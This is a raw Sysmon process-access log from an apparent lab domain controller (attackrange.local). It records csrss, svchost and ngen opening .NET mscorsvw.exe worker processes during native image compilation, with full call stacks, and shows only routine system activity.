10341000x80000000000000006235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.359{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1302-00000000A301}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.359{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1302-00000000A301}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.312{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1202-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.296{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1202-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.296{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1202-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.265{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1102-00000000A301}4768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.249{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1102-00000000A301}4768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.249{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1102-00000000A301}4768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.218{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1002-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.202{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1002-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.202{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1002-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-0F02-00000000A301}1584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.093{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-0F02-00000000A301}1584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.093{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-0F02-00000000A301}1584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-0E02-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.031{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-0E02-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.031{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-0E02-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:32.375{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9138-6005-2102-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.360{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9138-6005-2102-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:32.360{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9138-6005-2102-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.235{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9138-6005-2002-00000000A301}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.235{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9138-6005-2002-00000000A301}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.235{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9138-6005-2002-00000000A301}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 